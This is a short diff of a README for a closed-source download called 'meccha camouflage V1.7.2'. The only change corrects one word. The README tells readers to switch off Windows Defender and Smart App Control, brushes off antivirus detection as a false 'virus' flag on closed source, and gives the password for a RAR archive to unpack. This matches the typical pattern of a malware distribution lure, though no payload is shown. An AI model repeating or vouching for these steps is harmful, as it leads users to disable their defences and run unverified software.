MecchaElov/meccha-camouflage-V1.7.2/README.md

 python,

 # - 2 before download you will need to turn off smart app control and windows Defender
-(if you are not sure about this it is beacuse windows defender takes closed source and a "virus" and smart app control wont let you open closed source projects if they do not have a verified realeser)
+(if you are not sure about this it is beacuse windows defender takes closed source as a "virus" and smart app control wont let you open closed source projects if they do not have a verified realeser)

 # - 3 download "meccha camouflage V1.7.2" then create a folder on your desktop and call it whatever you want now open "meccha camouflage V1.7.2" and take the files out from the winrar into your folder
 (password is "Meccha Cmoufalge")